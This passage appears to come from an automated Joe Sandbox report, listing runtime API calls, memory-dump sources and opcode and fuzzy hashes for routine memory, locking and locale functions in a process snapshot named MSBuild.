                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1394714614-0
                                                                                                                                                                                                                      • Opcode ID: 8be4007de3193d11a042b4e9ea90ec6033303a410a413030008948e0e3fb4916
                                                                                                                                                                                                                      • Instruction ID: 6318466a9ae6b3691dde41b18f9ebd4e8cf30569b46835b185b7e3d2abd737be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8be4007de3193d11a042b4e9ea90ec6033303a410a413030008948e0e3fb4916
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2241B2B2D012198FCB20DF6CDD805BEB7B5BF85324B250A39E825E7B81E731A91587D1
                                                                                                                                                                                                                      Function 6C88EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(6C905104), ref: 6C88EFAC
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C88EFD7
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88EFEC
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C88F00C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C88F02E
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?), ref: 6C88F041
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C88F065
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C88F072
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1148890222-0
                                                                                                                                                                                                                      • Opcode ID: 2a1f3362e2a319d6f2d52b906bd41424536169f1f00c39d351bb3157eba401f2
                                                                                                                                                                                                                      • Instruction ID: 5608c0a291f15aaad6fce66107148b0b7f591fede8b5267f95fb98b1fbe675ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a1f3362e2a319d6f2d52b906bd41424536169f1f00c39d351bb3157eba401f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1241F6B1A002059FCB28CF68DD809AE77A5AF94314B240A3CE825DB795EB71E915C7E1
                                                                                                                                                                                                                      Function 6C8FB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C8FB5B9
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C8FB5C5
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C8FB5DA
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C8FB5F4
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8FB605
                                                                                                                                                                                                                      • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C8FB61F
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8FB631
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8FB655
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1276798925-0
                                                                                                                                                                                                                      • Opcode ID: cc3c2f5d4007680f194f9b9a2bdb28c01b958156d062fa443f3d81d58383eb07
                                                                                                                                                                                                                      • Instruction ID: 609e63fd7af82d79dd14efe7cd0e9eeefcdcb604548ed51212e8cebd55ff0eb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc3c2f5d4007680f194f9b9a2bdb28c01b958156d062fa443f3d81d58383eb07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F031B371B04104CBCF10DF68C9989AEB7B5FF8A364B24092DE912A7740DB34A90ACB91
                                                                                                                                                                                                                      Function 6C899830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C8E7ABE), ref: 6C89985B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C8E7ABE), ref: 6C8998A8
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000020), ref: 6C899909
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C899918
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C899975
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1281542009-0
                                                                                                                                                                                                                      • Opcode ID: 85623f5bffb5d9f6fc85b789972f2c211703c9317be412d354fd19ddd1ab9021
                                                                                                                                                                                                                      • Instruction ID: f125ae9ff5802ad49a123878087dc2f4fd8bc797ac27ae294b3f2de9c33ba440
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85623f5bffb5d9f6fc85b789972f2c211703c9317be412d354fd19ddd1ab9021
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F7188B46047098FC725CF2CC580A56B7F1FF4A3247244AADE85A8BBA1D731B842CB91
                                                                                                                                                                                                                      Function 6C89B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B7E6
                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B80C
                                                                                                                                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE), ref: 6C89B88E
                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B896
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 922945588-0
                                                                                                                                                                                                                      • Opcode ID: 01c37d86926d1176c8ef9a3b5af0e39a067c23e88d853501f64ea7c445d31719
                                                                                                                                                                                                                      • Instruction ID: e8ed1cfe5a100121c61018e72385aa6a069e759807d7dd6b2ef809713c0073cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01c37d86926d1176c8ef9a3b5af0e39a067c23e88d853501f64ea7c445d31719
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 485165757042148FCB24CF5CC684A7ABBF5FF89318B69895DE98A9B741C731E801CB80
                                                                                                                                                                                                                      Function 6C8C4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B48
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B7F
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B94
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4BBC
                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4BEE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                                                                                                                                                      • String ID: pid:
                                                                                                                                                                                                                      • API String ID: 1916652239-3403741246
                                                                                                                                                                                                                      • Opcode ID: 0a485a88b1b64dfcde41eb4971f1cb858d705ad962c1b3c7bb64d836acaf1722
                                                                                                                                                                                                                      • Instruction ID: 5981b7fded9de498ee48067c761fe66a9cafc65c4e97149cd173eb8526684480
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a485a88b1b64dfcde41eb4971f1cb858d705ad962c1b3c7bb64d836acaf1722
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E41E8717042159BCB24CFBCDD805AFBBF9AFC5224B144A38E865D7781D730D94887A2
                                                                                                                                                                                                                      Function 6C8D1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D1D0F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6C8D1BE3,?,?,6C8D1D96,00000000), ref: 6C8D1D18
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6C8D1BE3,?,?,6C8D1D96,00000000), ref: 6C8D1D4C
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D1DB7
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8D1DC0
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8D1DDA
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: GetCurrentThreadId.KERNEL32 ref: 6C8D1F03
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C8D1DF2,00000000,00000000), ref: 6C8D1F0C
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C8D1F20
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C8D1DF4
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1880959753-0
                                                                                                                                                                                                                      • Opcode ID: 2cca7d65f2b764de14113c59756bd99f6cc2ee13465131381613059bf0412ace
                                                                                                                                                                                                                      • Instruction ID: 5923fee556997c3cbfd4bdbe9db63a55dd68a016a2adeb361a5ac6004de527a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cca7d65f2b764de14113c59756bd99f6cc2ee13465131381613059bf0412ace
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4418AB52047019FCB20CF28C589A56BBF9FF49324F20482EE99A87B41CB71F814CB90
                                                                                                                                                                                                                      Function 6C8EAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E220,?), ref: 6C8EBC2D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90E220), ref: 6C8EBC42
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6C8FE300), ref: 6C8EBC82
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6C90E210), ref: 6C8EBC91
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6C90E208), ref: 6C8EBCA3
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6C90E21C), ref: 6C8EBCD2
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8EBCD8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                      • Opcode ID: 1bb812bbc9529e87cf87523f9e73f2768161cabaf3634d96b8861665a1bd116b
                                                                                                                                                                                                                      • Instruction ID: 8cc72004a38cd48df3fc3e9fe019ad644a8a6103976ed31250152a9e6c6fe5bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bb812bbc9529e87cf87523f9e73f2768161cabaf3634d96b8861665a1bd116b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8121F172604704CFE3308F49CA80B66B7B8BF46718F15882DE4295BA10CB31E846CBD4
                                                                                                                                                                                                                      Function 6C8938A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E220,?,?,?,?,6C893899,?), ref: 6C8938B2
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90E220,?,?,?,6C893899,?), ref: 6C8938C3
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,6C893899,?), ref: 6C8938F1
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C893920
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C893899,?), ref: 6C89392F
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C893899,?), ref: 6C893943
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C89396E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                      • Opcode ID: 14a2fbba6d41ebecdc38863fa37bcab12cbbb76ef9301896073169798fd300fe
                                                                                                                                                                                                                      • Instruction ID: e53138a4851c2a9f26168b9a8bdcedb8fbbaa8babb92e1f459af856cbb7f17de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14a2fbba6d41ebecdc38863fa37bcab12cbbb76ef9301896073169798fd300fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF21B172600620DFD730DF19C980B96B7A9EF46328F258829D95EA7B11C731FD85CB90
                                                                                                                                                                                                                      Function 6C8C84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C84F3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C850A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C851E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C855B
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C856F
                                                                                                                                                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C85AC
                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C767F
                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C7693
                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C76A7
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C85B2
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2666944752-0
                                                                                                                                                                                                                      • Opcode ID: f2fb0c0cde92b6c89f58a045f66235c3d72162d703b94a27228dde27694ac670
                                                                                                                                                                                                                      • Instruction ID: cb616858952e559079abd3581d62bfd4cee13a08cc6d7e46a1521ac5ce0f0a38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2fb0c0cde92b6c89f58a045f66235c3d72162d703b94a27228dde27694ac670
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35217A743006019FDB24DB28C988A6AB7B5AF8430CF24482DE59B83B81DB71F958CB52
                                                                                                                                                                                                                      Function 6C891640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C891699
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916CB
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916D7
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916DE
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916E5
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916EC
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8916F9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 375572348-0
                                                                                                                                                                                                                      • Opcode ID: b4131d2526722567d83f53bbf578484642adb1c1f99d26ff7af8578698e1ec8a
                                                                                                                                                                                                                      • Instruction ID: 2b082f84f55bb98f2adde3fa62a9ac96a8aa231c3ecda2b19cad2be235db0c11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4131d2526722567d83f53bbf578484642adb1c1f99d26ff7af8578698e1ec8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A221C3B17442086FEB216A688D85FBAB37CDF86704F00492CF6459B580C7749E5486A1
                                                                                                                                                                                                                      Function 6C8DD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
